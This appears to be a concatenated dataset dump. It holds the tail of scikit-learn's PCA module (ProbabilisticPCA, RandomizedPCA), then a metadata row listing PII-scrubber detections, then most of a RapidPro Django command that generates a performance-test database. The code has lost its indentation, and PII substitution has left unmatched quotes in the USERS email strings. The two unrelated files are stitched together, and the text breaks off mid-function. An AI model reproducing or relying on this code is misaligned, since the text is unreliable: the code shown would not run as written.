If whitening is enabled, inverse_transform does not compute the
exact inverse operation of transform.
"""
return fast_dot(X, self.components_) + self.mean_
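# A minimal self-check sketch (not part of the original source); it assumes
# only the PCA class defined above. Without whitening, fit(X) followed by
# transform(X) matches fit_transform(X); with whitening, inverse_transform
# is only an approximate inverse, as the docstrings above note.
def _pca_roundtrip_demo():  # pragma: no cover
    import numpy as np
    X = np.array([[-1., -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    # fit + transform and fit_transform agree when whiten=False
    assert np.allclose(PCA(n_components=2).fit(X).transform(X),
                       PCA(n_components=2).fit_transform(X))
    # with whitening enabled, the round trip is inexact
    pca_w = PCA(n_components=2, whiten=True).fit(X)
    assert not np.allclose(pca_w.inverse_transform(pca_w.transform(X)), X)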
class ProbabilisticPCA(PCA):
"""Additional layer on top of PCA that adds a probabilistic evaluation"""
__doc__ += PCA.__doc__
def fit(self, X, y=None, homoscedastic=True):
"""Additionally to PCA.fit, learns a covariance model
Parameters
----------
X : array of shape(n_samples, n_features)
The data to fit
homoscedastic : bool, optional,
If True, average variance across remaining dimensions
"""
PCA.fit(self, X)
n_samples, n_features = X.shape
self._dim = n_features
Xr = X - self.mean_
Xr -= np.dot(np.dot(Xr, self.components_.T), self.components_)
n_components = self.n_components
if n_components is None:
n_components = n_features
# Make the low rank part of the estimated covariance
self.covariance_ = np.dot(self.components_[:n_components].T *
self.explained_variance_[:n_components],
self.components_[:n_components])
if n_features == n_components:
delta = 0.
elif homoscedastic:
delta = (Xr ** 2).sum() / (n_samples * n_features)
else:
delta = (Xr ** 2).mean(axis=0) / (n_features - n_components)
# Add delta to the diagonal without extra allocation
self.covariance_.flat[::n_features + 1] += delta
return self
def score(self, X, y=None):
"""Return a score associated to new data
Parameters
----------
X: array of shape(n_samples, n_features)
The data to test
Returns
-------
ll: array of shape (n_samples),
log-likelihood of each row of X under the current model
"""
Xr = X - self.mean_
n_features = X.shape[1]
log_like = np.zeros(X.shape[0])
self.precision_ = linalg.inv(self.covariance_)
log_like = -.5 * (Xr * (np.dot(Xr, self.precision_))).sum(axis=1)
log_like -= .5 * (fast_logdet(self.covariance_)
+ n_features * log(2. * np.pi))
return log_like
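# A minimal numeric sketch (not part of the original source) of the Gaussian
# log-likelihood that ProbabilisticPCA.score evaluates, checked against
# scipy.stats (assumes scipy >= 0.14 for multivariate_normal); the covariance
# and sample sizes are illustrative.
def _gaussian_loglik_demo():  # pragma: no cover
    import numpy as np
    from scipy import linalg as la, stats
    rng = np.random.RandomState(0)
    mean, cov = np.zeros(3), np.diag([2., 1., .5])
    X = rng.multivariate_normal(mean, cov, size=5)
    Xr = X - mean
    # same row-wise quadratic form and normalization terms as score() above
    ll = -.5 * (Xr * np.dot(Xr, la.inv(cov))).sum(axis=1)
    ll -= .5 * (np.log(la.det(cov)) + 3 * np.log(2. * np.pi))
    assert np.allclose(ll, stats.multivariate_normal(mean, cov).logpdf(X))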
class RandomizedPCA(BaseEstimator, TransformerMixin):
"""Principal component analysis (PCA) using randomized SVD
Linear dimensionality reduction using approximated Singular Value
Decomposition of the data and keeping only the most significant
singular vectors to project the data to a lower dimensional space.
Parameters
----------
n_components : int, optional
Maximum number of components to keep. When not given or None, this
is set to n_features (the second dimension of the training data).
copy : bool
If False, data passed to fit are overwritten and running
fit(X).transform(X) will not yield the expected results,
use fit_transform(X) instead.
iterated_power : int, optional
Number of iterations for the power method. 3 by default.
whiten : bool, optional
When True (False by default) the `components_` vectors are divided
by the singular values to ensure uncorrelated outputs with unit
component-wise variances.
Whitening will remove some information from the transformed signal
(the relative variance scales of the components) but can sometime
improve the predictive accuracy of the downstream estimators by
making their data respect some hard-wired assumptions.
random_state : int or RandomState instance or None (default)
Pseudo Random Number generator seed control. If None, use the
numpy.random singleton.
Attributes
----------
`components_` : array, [n_components, n_features]
Components with maximum variance.
`explained_variance_ratio_` : array, [n_components]
Percentage of variance explained by each of the selected components. \
If ``n_components`` is not set then all components are stored and the \
sum of explained variances is equal to 1.0
Examples
--------
>>> import numpy as np
>>> from sklearn.decomposition import RandomizedPCA
>>> X = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
>>> pca = RandomizedPCA(n_components=2)
>>> pca.fit(X) # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
RandomizedPCA(copy=True, iterated_power=3, n_components=2,
random_state=None, whiten=False)
>>> print(pca.explained_variance_ratio_) # doctest: +ELLIPSIS
[ 0.99244... 0.00755...]
See also
--------
PCA
ProbabilisticPCA
TruncatedSVD
References
----------
.. [Halko2009] `Finding structure with randomness: Stochastic algorithms
for constructing approximate matrix decompositions Halko, et al., 2009
(arXiv:0909.4061)`
.. [MRT] `A randomized algorithm for the decomposition of matrices
Per-Gunnar Martinsson, Vladimir Rokhlin and Mark Tygert`
Notes
-----
This class supports sparse matrix input for backward compatibility, but
actually computes a truncated SVD instead of a PCA in that case (i.e. no
centering is performed). This support is deprecated; use the class
TruncatedSVD for sparse matrix support.
"""
def __init__(self, n_components=None, copy=True, iterated_power=3,
whiten=False, random_state=None):
self.n_components = n_components
self.copy = copy
self.iterated_power = iterated_power
self.whiten = whiten
self.mean_ = None
self.random_state = random_state
def fit(self, X, y=None):
"""Fit the model with X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
self : object
Returns the instance itself.
"""
self._fit(X)
return self
def _fit(self, X):
"""Fit the model to the data X.
Parameters
----------
X: array-like, shape (n_samples, n_features)
Training vector, where n_samples in the number of samples and
n_features is the number of features.
Returns
-------
X : ndarray, shape (n_samples, n_features)
The input data, copied, centered and whitened when requested.
"""
random_state = check_random_state(self.random_state)
if hasattr(X, 'todense'):
warnings.warn("Sparse matrix support is deprecated"
" and will be dropped in 0.16."
" Use TruncatedSVD instead.",
DeprecationWarning)
else:
# not a sparse matrix, ensure this is a 2D array
X = np.atleast_2d(as_float_array(X, copy=self.copy))
n_samples = X.shape[0]
if not hasattr(X, 'todense'):
# Center data
self.mean_ = np.mean(X, axis=0)
X -= self.mean_
if self.n_components is None:
n_components = X.shape[1]
else:
n_components = self.n_components
U, S, V = randomized_svd(X, n_components,
n_iter=self.iterated_power,
random_state=random_state)
self.explained_variance_ = exp_var = (S ** 2) / n_samples
self.explained_variance_ratio_ = exp_var / exp_var.sum()
if self.whiten:
self.components_ = V / S[:, np.newaxis] * sqrt(n_samples)
else:
self.components_ = V
return X
def transform(self, X, y=None):
"""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
# XXX remove scipy.sparse support here in 0.16
X = atleast2d_or_csr(X)
if self.mean_ is not None:
X = X - self.mean_
X = safe_sparse_dot(X, self.components_.T)
return X
def fit_transform(self, X, y=None):
"""Apply dimensionality reduction on X.
Parameters
----------
X : array-like, shape (n_samples, n_features)
New data, where n_samples in the number of samples
and n_features is the number of features.
Returns
-------
X_new : array-like, shape (n_samples, n_components)
"""
X = self._fit(atleast2d_or_csr(X))
X = safe_sparse_dot(X, self.components_.T)
return X
def inverse_transform(self, X, y=None):
"""Transform data back to its original space.
Returns an array X_original whose transform would be X.
Parameters
----------
X : array-like, shape (n_samples, n_components)
New data, where n_samples in the number of samples
and n_components is the number of components.
Returns
-------
X_original array-like, shape (n_samples, n_features)
Notes
-----
If whitening is enabled, inverse_transform does not compute the
exact inverse operation of transform.
"""
# XXX remove scipy.sparse support here in 0.16
X_original = safe_sparse_dot(X, self.components_)
if self.mean_ is not None:
X_original = X_original + self.mean_
return X_original
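# A minimal numpy sketch (not part of the original source) of the randomized
# power-iteration scheme behind `iterated_power`, after Halko et al.: project
# onto a random subspace, sharpen it with a few applications of A^T A, then
# solve a small exact SVD. This is a stripped-down sketch, not the library's
# exact implementation, and all sizes are illustrative.
def _randomized_svd_demo():  # pragma: no cover
    import numpy as np
    from scipy import linalg
    rng = np.random.RandomState(0)
    # synthetic 100 x 30 matrix with a rapidly decaying spectrum
    U0, _ = linalg.qr(rng.randn(100, 10), mode='economic')
    V0, _ = linalg.qr(rng.randn(30, 10), mode='economic')
    A = np.dot(U0 * np.logspace(2, -2, 10), V0.T)
    k, n_iter = 5, 3
    Q = rng.randn(A.shape[1], k)                     # random test matrix
    for _ in range(n_iter):                          # power iterations
        Q = np.dot(A.T, np.dot(A, Q))
    Q, _ = linalg.qr(np.dot(A, Q), mode='economic')  # orthonormal range basis
    B = np.dot(Q.T, A)                               # small projected problem
    Uhat, S, Vt = linalg.svd(B, full_matrices=False)
    U = np.dot(Q, Uhat)
    assert np.allclose(S, linalg.svd(A, compute_uv=False)[:k], rtol=1e-2)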
| 20,495 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Alexandre Gramfort'], ['PERSON', 'Olivier Grisel'], ['LOCATION', 'n_samples'], ['PERSON', 'Thomas P. Minka'], ['LOCATION', 'log(2'], ['LOCATION', 'log(2'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['PERSON', 'n_components'], ['PERSON', 'Thomas P. Minka'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'log(2'], ['LOCATION', 'n_components'], ['DATE_TIME', '2009'], ['PERSON', 'Gunnar Martinsson'], ['PERSON', 'Vladimir Rokhlin'], ['PERSON', 'Mark Tygert'], ['NRP', 'self.copy'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'n_samples'], ['PERSON', 'todense'], ['LOCATION', 'randomized_svd(X'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['LOCATION', 'n_components'], ['LOCATION', 'n_samples'], ['PERSON', 'n_components'], ['LOCATION', 'n_samples'], ['IP_ADDRESS', '\n\n '], ['IP_ADDRESS', '::'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', '..ba'], ['URL', 'np.su'], ['URL', 'np.su'], ['URL', 'spectrum.co'], ['URL', 'll.ar'], ['URL', 'scipy.li'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'linalg.sv'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'np.su'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'PCA.fi'], ['URL', 'PCA.fi'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.do'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.co'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'X.sh'], ['URL', 'self.pr'], ['URL', 'linalg.in'], ['URL', 'self.co'], ['URL', 'np.do'], ['URL', 'self.pr'], ['URL', 'self.co'], ['URL', 'sklearn.de'], ['URL', 'np.ar'], ['URL', 'pca.fi'], ['URL', 'self.co'], ['URL', 'self.it'], ['URL', 'self.me'], ['URL', 'np.at'], ['URL', 'self.co'], ['URL', 'X.sh'], ['URL', 'self.me'], ['URL', 'np.me'], ['URL', 'self.me'], ['URL', 'X.sh'], ['URL', 'self.it'], ['URL', 'var.su'], ['URL', 'self.com'], ['URL', 'np.ne'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 
'self.me'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.com'], ['URL', 'self.me'], ['URL', 'self.me']] |
86 | from __future__ import unicode_literals, division, print_function
import json
import math
import pytz
import random
import resource
import six
import sys
import time
import uuid
from collections import defaultdict
from datetime import timedelta
from django.conf import settings
from django.contrib.auth.models import User
from django.core.management import BaseCommand, CommandError
from django.core.management.base import CommandParser
from django.db import connection, transaction
from django.utils import timezone
from django_redis import get_redis_connection
from subprocess import check_call, CalledProcessError
from temba.channels.models import Channel
from temba.channels.tasks import squash_channelcounts
from temba.contacts.models import Contact, ContactField, ContactGroup, ContactURN, ContactGroupCount, URN, TEL_SCHEME, TWITTER_SCHEME
from temba.flows.models import FlowStart, FlowRun
from temba.flows.tasks import squash_flowpathcounts, squash_flowruncounts, prune_recentmessages
from temba.locations.models import AdminBoundary
from temba.msgs.models import Label, Msg
from temba.msgs.tasks import squash_labelcounts
from temba.orgs.models import Org
from temba.orgs.tasks import squash_topupcredits
from temba.utils import chunk_list, ms_to_datetime, datetime_to_str, datetime_to_ms
from temba.values.models import Value
# maximum age in days of database content
CONTENT_AGE = 3 * 365
# every user will have this password including the superuser
USER_PASSWORD = "Qwerty123"
# database dump containing admin boundary records
LOCATIONS_DUMP = 'test-data/nigeria.bin'
# organization names are generated from these components
ORG_NAMES = (
("UNICEF", "WHO", "WFP", "UNESCO", "UNHCR", "UNITAR", "FAO", "UNEP", "UNAIDS", "UNDAF"),
("Nigeria", "Chile", "Indonesia", "Rwanda", "Mexico", "Zambia", "India", "Brazil", "Sudan", "Mozambique")
)
# the users, channels, groups, labels and fields to create for each organization
USERS = (
{'username': "admin%d", 'email': dummy@email.com", 'role': 'administrators'},
{'username': "editor%d", 'email': dummy@email.com", 'role': 'editors'},
{'username': "viewer%d", 'email': dummy@email.com", 'role': 'viewers'},
{'username': "surveyor%d", 'email': dummy@email.com", 'role': 'surveyors'},
)
CHANNELS = (
{'name': "Android", 'channel_type': Channel.TYPE_ANDROID, 'scheme': 'tel', 'address': "1234"},
{'name': "Nexmo", 'channel_type': Channel.TYPE_NEXMO, 'scheme': 'tel', 'address': "2345"},
{'name': "Twitter", 'channel_type': 'TT', 'scheme': 'twitter', 'address': "my_handle"},
)
FIELDS = (
{'key': 'gender', 'label': "Gender", 'value_type': Value.TYPE_TEXT},
{'key': 'age', 'label': "Age", 'value_type': Value.TYPE_DECIMAL},
{'key': 'joined', 'label': "Joined On", 'value_type': Value.TYPE_DATETIME},
{'key': 'ward', 'label': "Ward", 'value_type': Value.TYPE_WARD},
{'key': 'district', 'label': "District", 'value_type': Value.TYPE_DISTRICT},
{'key': 'state', 'label': "State", 'value_type': Value.TYPE_STATE},
)
GROUPS = (
{'name': "Reporters", 'query': None, 'member': 0.95}, # member is either a probability or callable
{'name': "Farmers", 'query': None, 'member': 0.5},
{'name': "Doctors", 'query': None, 'member': 0.4},
{'name': "Teachers", 'query': None, 'member': 0.3},
{'name': "Drivers", 'query': None, 'member': 0.2},
{'name': "Testers", 'query': None, 'member': 0.1},
{'name': "Empty", 'query': None, 'member': 0.0},
{'name': "Youth (Dynamic)", 'query': 'age <= 18', 'member': lambda c: c['age'] and c['age'] <= 18},
{'name': "Unregistered (Dynamic)", 'query': 'joined = ""', 'member': lambda c: not c['joined']},
{'name': "Districts (Dynamic)", 'query': 'district=Faskari or district=Zuru or district=Anka',
'member': lambda c: c['district'] and c['district'].name in ("Faskari", "Zuru", "Anka")},
)
LABELS = ("Reporting", "Testing", "Youth", "Farming", "Health", "Education", "Trade", "Driving", "Building", "Spam")
FLOWS = (
{'name': "Favorites", 'file': "favorites.json", 'templates': (
["blue", "mutzig", "bob"],
["orange", "green", "primus", "jeb"],
)},
{'name': "SMS Form", 'file': "sms_form.json", 'templates': (["22 F Seattle"], ["35 M MIAMI"])},
{'name': "Pick a Number", 'file': "pick_a_number.json", 'templates': (["1"], ["4"], ["5"], ["7"], ["8"])}
)
# contact names are generated from these components
CONTACT_NAMES = (
("", "Anne", "Bob", "Cathy", "Dave", "Evan", "Freda", "George", "Hallie", "Igor"),
("", "Jameson", "Kardashian", "Lopez", "Mooney", "Newman", "O'Shea", "Poots", "Quincy", "Roberts"),
)
CONTACT_LANGS = (None, "eng", "fre", "spa", "kin")
CONTACT_HAS_TEL_PROB = 0.9 # 9/10 contacts have a phone number
CONTACT_HAS_TWITTER_PROB = 0.1 # 1/10 contacts have a twitter handle
CONTACT_IS_STOPPED_PROB = 0.01 # 1/100 contacts are stopped
CONTACT_IS_BLOCKED_PROB = 0.01 # 1/100 contacts are blocked
CONTACT_IS_DELETED_PROB = 0.005 # 1/200 contacts are deleted
CONTACT_HAS_FIELD_PROB = 0.8 # 8/10 fields set for each contact
RUN_RESPONSE_PROB = 0.1 # 1/10 runs will be responded to
INBOX_MESSAGES = (("What is", "I like", "No"), ("beer", "tea", "coffee"), ("thank you", "please", "today"))
class Command(BaseCommand):
COMMAND_GENERATE = 'generate'
COMMAND_SIMULATE = 'simulate'
help = "Generates a database suitable for performance testing"
def add_arguments(self, parser):
cmd = self
subparsers = parser.add_subparsers(dest='command', help='Command to perform',
parser_class=lambda **kw: CommandParser(cmd, **kw))
gen_parser = subparsers.add_parser('generate', help='Generates a clean testing database')
gen_parser.add_argument('--orgs', type=int, action='store', dest='num_orgs', default=100)
gen_parser.add_argument('--contacts', type=int, action='store', dest='num_contacts', default=1000000)
gen_parser.add_argument('--seed', type=int, action='store', dest='seed', default=None)
sim_parser = subparsers.add_parser('simulate', help='Simulates activity on an existing database')
sim_parser.add_argument('--runs', type=int, action='store', dest='num_runs', default=500)
def handle(self, command, *args, **kwargs):
start = time.time()
if command == self.COMMAND_GENERATE:
self.handle_generate(kwargs['num_orgs'], kwargs['num_contacts'], kwargs['seed'])
else:
self.handle_simulate(kwargs['num_runs'])
time_taken = time.time() - start
self._log("Completed in %d secs, peak memory usage: %d MiB\n" % (int(time_taken), int(self.peak_memory())))
def handle_generate(self, num_orgs, num_contacts, seed):
"""
Creates a clean database
"""
seed = self.configure_random(num_orgs, seed)
self._log("Generating random base database (seed=%d)...\n" % seed)
try:
has_data = Org.objects.exists()
except Exception: # pragma: no cover
raise CommandError("Run migrate command first to create database tables")
if has_data:
raise CommandError("Can't generate content in non-empty database.")
self.batch_size = 5000
# the timespan being modelled by this database
self.db_ends_on = timezone.now()
self.db_begins_on = self.db_ends_on - timedelta(days=CONTENT_AGE)
# this is a new database so clear out redis
self._log("Clearing out Redis cache... ")
r = get_redis_connection()
r.flushdb()
self._log(self.style.SUCCESS("OK") + '\n')
superuser = User.objects.create_superuser("root", "dummy@email.com", USER_PASSWORD)
country, locations = self.load_locations(LOCATIONS_DUMP)
orgs = self.create_orgs(superuser, country, num_orgs)
self.create_users(orgs)
self.create_channels(orgs)
self.create_fields(orgs)
self.create_groups(orgs)
self.create_labels(orgs)
self.create_flows(orgs)
self.create_contacts(orgs, locations, num_contacts)
def handle_simulate(self, num_runs):
"""
Prepares to resume simulating flow activity on an existing database
"""
self._log("Resuming flow activity simulation on existing database...\n")
orgs = list(Org.objects.order_by('id'))
if not orgs:
raise CommandError("Can't simulate activity on an empty database")
self.configure_random(len(orgs))
# in real life Nexmo messages are throttled, but that's not necessary for this simulation
del Channel.CHANNEL_SETTINGS[Channel.TYPE_NEXMO]['max_tps']
inputs_by_flow_name = {f['name']: f['templates'] for f in FLOWS}
self._log("Preparing existing orgs... ")
for org in orgs:
flows = list(org.flows.order_by('id'))
for flow in flows:
flow.input_templates = inputs_by_flow_name[flow.name]
org.cache = {
'users': list(org.get_org_users().order_by('id')),
'channels': list(org.channels.order_by('id')),
'groups': list(ContactGroup.user_groups.filter(org=org).order_by('id')),
'flows': flows,
'contacts': list(org.org_contacts.values_list('id', flat=True)), # only ids to save memory
'activity': None
}
self._log(self.style.SUCCESS("OK") + '\n')
self.simulate_activity(orgs, num_runs)
def configure_random(self, num_orgs, seed=None):
if not seed:
seed = random.randrange(0, 65536)
self.random = random.Random(seed)
# monkey patch uuid4 so it returns the same UUIDs for the same seed, see https://github.com/joke2k/faker/issues/484#issuecomment-287931101
from temba.utils import models
models.uuid4 = lambda: uuid.UUID(int=(self.random.getrandbits(128) | (1 << 63) | (1 << 78)) & (~(1 << 79) & ~(1 << 77) & ~(1 << 76) & ~(1 << 62)))
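# The bit twiddling above forces the RFC 4122 layout: bits 76-79 of the random
# 128-bit integer become 0b0100 (UUID version 4) and bits 62-63 become 0b10
# (the RFC 4122 variant), matching what uuid.uuid4() itself would produce.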
# We want a variety of large and small orgs so when allocating content like contacts and messages, we apply a
# bias toward the beginning orgs. if there are N orgs, then the amount of content the first org will be
# allocated is (1/N) ^ (1/bias). This sets the bias so that the first org will get ~50% of the content:
self.org_bias = math.log(1.0 / num_orgs, 0.5)
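# Worked check (hypothetical numbers): with num_orgs=100, bias is
# log(0.01, 0.5) ~= 6.64, so the first org's share of random_choice picks is
# (1 / 100) ** (1 / 6.64) ~= 0.5, i.e. roughly half of all generated content.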
return seed
def load_locations(self, path):
"""
Loads admin boundary records from the given dump of that table
"""
self._log("Loading locations from %s... " % path)
# load dump into current db with pg_restore
db_config = settings.DATABASES['default']
try:
check_call('export PGPASSWORD=%s && pg_restore -U%s -w -d %s %s' %
(db_config['PASSWORD'], db_config['USER'], db_config['NAME'], path), shell=True)
except CalledProcessError: # pragma: no cover
raise CommandError("Error occurred whilst calling pg_restore to load locations dump")
# fetch as tuples of (WARD, DISTRICT, STATE)
wards = AdminBoundary.objects.filter(level=3).prefetch_related('parent', 'parent__parent')
locations = [(w, w.parent, w.parent.parent) for w in wards]
country = AdminBoundary.objects.filter(level=0).get()
self._log(self.style.SUCCESS("OK") + '\n')
return country, locations
def create_orgs(self, superuser, country, num_total):
"""
Creates and initializes the orgs
"""
self._log("Creating %d orgs... " % num_total)
org_names = ['%s %s' % (o1, o2) for o2 in ORG_NAMES[1] for o1 in ORG_NAMES[0]]
self.random.shuffle(org_names)
orgs = []
for o in range(num_total):
orgs.append(Org(name=org_names[o % len(org_names)], timezone=self.random.choice(pytz.all_timezones),
brand='rapidpro.io', country=country,
created_on=self.db_begins_on, created_by=superuser, modified_by=superuser))
Org.objects.bulk_create(orgs)
orgs = list(Org.objects.order_by('id'))
self._log(self.style.SUCCESS("OK") + "\nInitializing orgs... ")
for o, org in enumerate(orgs):
org.initialize(topup_size=max((1000 - o), 1) * 1000)
# we'll cache some metadata on each org as it's created to save re-fetching things
org.cache = {
'users': [],
'fields': {},
'groups': [],
'system_groups': {g.group_type: g for g in ContactGroup.system_groups.filter(org=org)},
}
self._log(self.style.SUCCESS("OK") + '\n')
return orgs
def create_users(self, orgs):
"""
Creates a user of each type for each org
"""
self._log("Creating %d users... " % (len(orgs) * len(USERS)))
# create users for each org
for org in orgs:
for u in USERS:
user = User.objects.create_user(u['username'] % org.id, u['email'] % org.id, USER_PASSWORD)
getattr(org, u['role']).add(user)
user.set_org(org)
org.cache['users'].append(user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_channels(self, orgs):
"""
Creates the channels for each org
"""
self._log("Creating %d channels... " % (len(orgs) * len(CHANNELS)))
for org in orgs:
user = org.cache['users'][0]
for c in CHANNELS:
Channel.objects.create(org=org, name=c['name'], channel_type=c['channel_type'],
address=c['address'], schemes=[c['scheme']],
created_by=user, modified_by=user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_fields(self, orgs):
"""
Creates the contact fields for each org
"""
self._log("Creating %d fields... " % (len(orgs) * len(FIELDS)))
for org in orgs:
user = org.cache['users'][0]
for f in FIELDS:
field = ContactField.objects.create(org=org, key=f['key'], label=f['label'],
value_type=f['value_type'], show_in_table=True,
created_by=user, modified_by=user)
org.cache['fields'][f['key']] = field
self._log(self.style.SUCCESS("OK") + '\n')
def create_groups(self, orgs):
"""
Creates the contact groups for each org
"""
self._log("Creating %d groups... " % (len(orgs) * len(GROUPS)))
for org in orgs:
user = org.cache['users'][0]
for g in GROUPS:
if g['query']:
group = ContactGroup.create_dynamic(org, user, g['name'], g['query'])
else:
group = ContactGroup.user_groups.create(org=org, name=g['name'], created_by=user, modified_by=user)
group.member = g['member']
group.count = 0
org.cache['groups'].append(group)
self._log(self.style.SUCCESS("OK") + '\n')
def create_labels(self, orgs):
"""
Creates the message labels for each org
"""
self._log("Creating %d labels... " % (len(orgs) * len(LABELS)))
for org in orgs:
user = org.cache['users'][0]
for name in LABELS:
Label.label_objects.create(org=org, name=name, created_by=user, modified_by=user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_flows(self, orgs):
"""
Creates the flows for each org
"""
self._log("Creating %d flows... " % (len(orgs) * len(FLOWS)))
for org in orgs:
user = org.cache['users'][0]
for f in FLOWS:
with open('media/test_flows/' + f['file'], 'r') as flow_file:
org.import_app(json.load(flow_file), user)
self._log(self.style.SUCCESS("OK") + '\n')
def create_contacts(self, orgs, locations, num_contacts):
"""
Creates test and regular contacts for this database. Contacts are generated
as flat dicts in batches to avoid holding all contact and URN objects in memory.
"""
group_counts = defaultdict(int)
self._log("Creating %d test contacts..." % (len(orgs) * len(USERS)))
for org in orgs:
test_contacts = []
for user in org.cache['users']:
test_contacts.append(Contact.get_test_contact(user))
org.cache['test_contacts'] = test_contacts
self._log(self.style.SUCCESS("OK") + '\n')
self._log("Creating %d regular contacts...\n" % num_contacts)
# disable table triggers to speed up insertion and in the case of contact group m2m, avoid having an unsquashed
# count row for every contact
with DisableTriggersOn(Contact, ContactURN, Value, ContactGroup.contacts.through):
names = [('%s %s' % (c1, c2)).strip() for c2 in CONTACT_NAMES[1] for c1 in CONTACT_NAMES[0]]
names = [n if n else None for n in names]
batch_num = 1
for index_batch in chunk_list(six.moves.xrange(num_contacts), self.batch_size):
batch = []
# generate flat representations and contact objects for this batch
for c_index in index_batch: # pragma: no cover
org = self.random_org(orgs)
name = self.random_choice(names)
location = self.random_choice(locations) if self.probability(CONTACT_HAS_FIELD_PROB) else None
created_on = self.timeline_date(c_index / num_contacts)
c = {
'org': org,
'user': org.cache['users'][0],
'name': name,
'groups': [],
'tel': '+2507%08d' % c_index if self.probability(CONTACT_HAS_TEL_PROB) else None,
'twitter': '%s%d' % (name.replace(' ', '_').lower() if name else 'tweep', c_index) if self.probability(CONTACT_HAS_TWITTER_PROB) else None,
'gender': self.random_choice(('M', 'F')) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'age': self.random.randint(16, 80) if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'joined': self.random_date() if self.probability(CONTACT_HAS_FIELD_PROB) else None,
'ward': location[0] if location else None,
'district': location[1] if location else None,
'state': location[2] if location else None,
'language': self.random_choice(CONTACT_LANGS),
'is_stopped': self.probability(CONTACT_IS_STOPPED_PROB),
'is_blocked': self.probability(CONTACT_IS_BLOCKED_PROB),
'is_active': self.probability(1 - CONTACT_IS_DELETED_PROB),
'created_on': created_on,
'modified_on': self.random_date(created_on, self.db_ends_on),
}
# work out which system groups this contact belongs to
if c['is_active']:
if not c['is_blocked'] and not c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_ALL])
if c['is_blocked']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_BLOCKED])
if c['is_stopped']:
c['groups'].append(org.cache['system_groups'][ContactGroup.TYPE_STOPPED])
# let each user group decide if it is taking this contact
for g in org.cache['groups']:
if g.member(c) if callable(g.member) else self.probability(g.member):
c['groups'].append(g)
# track changes to group counts
for g in c['groups']:
group_counts[g] += 1
batch.append(c)
self._create_contact_batch(batch)
self._log(" > Created batch %d of %d\n" % (batch_num, max(num_contacts // self.batch_size, 1)))
batch_num += 1
# create group count records manually
counts = []
for group, count in group_counts.items():
counts.append(ContactGroupCount(group=group, count=count, is_squashed=True))
group.count = count
ContactGroupCount.objects.bulk_create(counts)
def _create_contact_batch(self, batch):
"""
Bulk creates a batch of contacts from flat representations
"""
for c in batch:
c['object'] = Contact(org=c['org'], name=c['name'], language=c['language'],
is_stopped=c['is_stopped'], is_blocked=c['is_blocked'],
is_active=c['is_active'],
created_by=c['user'], created_on=c['created_on'],
modified_by=c['user'], modified_on=c['modified_on'])
Contact.objects.bulk_create([c['object'] for c in batch])
# now that contacts have pks, bulk create the actual URN, value and group membership objects
batch_urns = []
batch_values = []
batch_memberships = []
for c in batch:
org = c['org']
c['urns'] = []
if c['tel']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TEL_SCHEME,
path=c['tel'], identity=URN.from_tel(c['tel'])))
if c['twitter']:
c['urns'].append(ContactURN(org=org, contact=c['object'], priority=50, scheme=TWITTER_SCHEME,
path=c['twitter'], identity=URN.from_twitter(c['twitter'])))
